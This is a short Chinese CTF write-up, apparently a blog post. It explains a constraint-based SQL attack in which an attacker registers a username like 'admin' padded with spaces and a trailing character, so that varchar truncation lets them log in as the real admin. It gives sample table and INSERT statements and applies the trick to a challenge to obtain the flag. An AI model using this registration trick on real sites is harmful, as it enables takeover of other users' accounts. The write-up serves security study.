【ctf】sql注入——基于约束的SQL攻击

基于约束的SQL攻击

主要存在于在INSERT中,SQL会根据varchar(n)来限制字符串的最大长度。如果字符串的长度大于“n”个字符的话,那么仅使用字符串的前“n”个字符。

注册:
1.username:admin; password:123456
2.username:admin                       1; password:123456

这里我们可以想到,如果只是使用前面五个字符,字符串末尾字符将会被删除,那么我们是不是可以通过该方法来注册并登录管理元账号?

进行测试:

首先创建一个数据表

create table user(
id int not null auto_increment,
username varchar(30) not null,
password varchar(30) not null,
primary key(id) );

在这里插入图片描述
注册一个账号

insert into user values ('1','admin','123456');
insert into user values ('1','admin                   1','123456');

在这里插入图片描述
发现可以同样通过username:admin; password:123456来进行登录的操作。这样就可以看出是存在基于约束的SQL攻击漏洞。

应用实例

在这里插入图片描述
直接注册:

insert into user values ('1','admin                   1','123456');

发现已经得到flag了
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值